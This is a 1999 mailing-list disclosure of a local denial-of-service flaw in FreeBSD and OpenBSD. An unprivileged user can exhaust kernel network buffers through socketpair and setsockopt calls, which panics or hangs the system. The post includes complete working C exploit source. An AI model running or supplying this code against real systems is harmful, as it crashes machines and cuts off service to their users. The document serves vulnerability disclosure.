Date: Wed, 1 Sep 1999 13:31:04 +0200
From: Sven Berkvens <sven@ILSE.NL.>
To: [email protected]Subject: Local DoS on network by unpriviledged user using setsockopt()
Recently, I mailed this mailing to a number of people who are concerned
with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
mailing was NOT intended to be made public, but somehow it was. Here is
my original mailing:
--- Forwarded ---
I stumbled across a denial of service attack on FreeBSD systems, where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:
FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to send
something over the network get stuck waiting in mbuf. Locally the system
continues to function. Tested by a friend.
NetBSD: Not available, but it is highly probable that the affected code
in OpenBSD is from its parent NetBSD.
As far as I'm concerned, this can be handled quietly and without much
haste. Knowledge of this problem is limited and there is absolutely no
intention of publishing this exploit or messages to Bugtraq.
With kind regards,
Sven Berkvens ([email protected])
Long time FreeBSD-system administrator
The source code for the program that causes this:
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
----- End forwarded message -----